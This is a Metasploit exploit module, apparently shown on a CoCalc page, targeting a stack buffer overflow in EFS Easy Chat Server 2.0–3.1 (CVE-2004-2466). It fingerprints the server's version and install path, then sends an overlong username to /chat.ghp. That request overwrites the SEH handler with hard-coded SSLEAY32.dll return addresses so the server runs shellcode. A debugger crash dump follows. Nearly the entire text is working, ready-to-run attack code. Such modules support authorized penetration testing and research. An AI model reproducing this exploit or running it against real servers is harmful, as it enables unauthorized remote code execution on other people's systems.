CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }
10

11
  include Msf::Exploit::Remote::HttpClient
12
  include Msf::Exploit::Remote::Seh
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
17
      'Description'    => %q{
18
          This module exploits a stack buffer overflow in EFS Software Easy Chat
19
        Server versions 2.0 to 3.1. By sending an overly long authentication
20
        request, an attacker may be able to execute arbitrary code.
21
      },
22
      'Author'         =>
23
        [
24
         'LSO <lso[at]hushmail.com>', # original metasploit
25
         'bcoles' # metasploit
26
        ],
27
      'License'        => BSD_LICENSE,
28
      'References'     =>
29
        [
30
          [ 'CVE',   '2004-2466' ],
31
          [ 'OSVDB', '7416' ],
32
          [ 'OSVDB', '106841' ],
33
          [ 'BID',   '25328' ]
34
        ],
35
      'DefaultOptions' =>
36
        {
37
          'EXITFUNC' => 'process',
38
        },
39
      'Privileged'     => false,
40
      'Payload'        =>
41
        {
42
          'Space'    => 7000,
43
          'BadChars' => "\x00\x0a\x0b\x0d\x0f\x20\x25\x26",
44
          'StackAdjustment' => -3500,
45
        },
46
      'Platform'       => 'win',
47
      'Targets'        =>
48
        [
49
          # Tested on Easy Chat Server v2.0, 2.1, 2.2, 2.5, 3.1 on:
50
          # -- Windows XP SP 3 (x86) (EN)
51
          # -- Windows 7  SP 1 (x64) (EN)
52
          # -- Windows 8  SP 0 (x64) (EN)
53
          [ 'Automatic Targeting', { 'auto' => true } ],
54
          # p/p/r SSLEAY32.dll
55
          [ 'Easy Chat Server 2.0', { 'Ret' => 0x10010E2E } ],
56
          # p/p/r SSLEAY32.dll
57
          [ 'Easy Chat Server 2.1 - 3.1', { 'Ret' => 0x1001071E } ]
58
        ],
59
      'DisclosureDate' => '2007-08-14',
60
      'DefaultTarget'  => 0))
61
  end
62

63
  def check
64
    version = get_version
65
    if not version
66
      return Exploit::CheckCode::Safe
67
    end
68
    vprint_status "Found version: #{version}"
69
    if version !~ /^(2\.\d|3\.0|3\.1)$/
70
      return Exploit::CheckCode::Safe
71
    end
72
    path = get_install_path
73
    if not path
74
      return Exploit::CheckCode::Detected
75
    end
76
    vprint_status "Found path: #{path}"
77
    return Exploit::CheckCode::Appears
78
  end
79

80
  #
81
  # Get software version from change log
82
  #
83
  def get_version
84
    res = send_request_raw 'uri' => '/whatsnew.txt'
85
    if res and res.body =~ /What's new in Easy Chat Server V(\d\.\d)/
86
      return "#{$1}"
87
    end
88
  end
89

90
  #
91
  # Get software installation path from uninstall file
92
  #
93
  def get_install_path
94
    res = send_request_raw 'uri' => '/unins000.dat'
95
    if res and res.body =~ /([A-Z]:\\[^\x00]{2,256})?\\[a-z]+\.htm/i
96
      return "#{$1}"
97
    end
98
  end
99

100
  def exploit
101

102
    # get target
103
    if target.name =~ /Automatic/
104
      version = get_version
105
      vprint_status "Found version: #{version}" if version
106
      if not version or version !~ /^(2\.\d|3\.0|3\.1)$/
107
        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
108
      elsif version =~ /(2\.0)/
109
        my_target = targets[1]
110
      elsif version =~ /(2\.\d|3\.0|3\.1)/
111
        my_target = targets[2]
112
      end
113
    else
114
      my_target = target
115
    end
116

117
    # get install path
118
    path = get_install_path
119
    if not path
120
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path")
121
    end
122
    path << "\\users\\"
123
    vprint_status "Using path: #{path}"
124

125
    # send payload
126
    sploit = rand_text_alpha(256 - path.length)
127
    sploit << generate_seh_payload(my_target.ret)
128
    print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})"
129
    send_request_cgi({
130
      'uri' => '/chat.ghp',
131
      'encode_params' => false,
132
      'vars_get' => {
133
        'username' => sploit,
134
        'password' => rand_text_alphanumeric(rand(10) + 1),
135
        'room' => 1,
136
        'sex' => rand_text_numeric(1)
137
      }
138
    }, 5)
139

140
  end
141
end
142

143
=begin
144

145
0x004144C8 calls sprintf with the following arguments:
146
sprintf(&FileName, "%susers\\%s", path, username);
147

148
Since we can make the username larger than the allocated buffer size
149
we end up overwriting SEH with a PPR from SSLEAY32.dll and nSEH with
150
a short jmp to the beginning of our shellcode.
151

152
(46c.144): Access violation - code c0000005 (first chance)
153
First chance exceptions are reported before any exception handling.
154
This exception may be expected and handled.
155
eax=ffffffff ebx=000007f6 ecx=0047fd50 edx=41414141 esi=000007ef edi=0047a3ea
156
eip=00445f34 esp=01216b88 ebp=01216ba0 iopl=0         nv up ei pl nz na po nc
157
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
158
EasyChat+0x45f34:
159
00445f34 8a02            mov     al,byte ptr [edx]          ds:0023:41414141=??
160

161
0:005> !exchain
162
01216dd8: 41414141
163
Invalid exception stack at 41414141
164
=end
165

166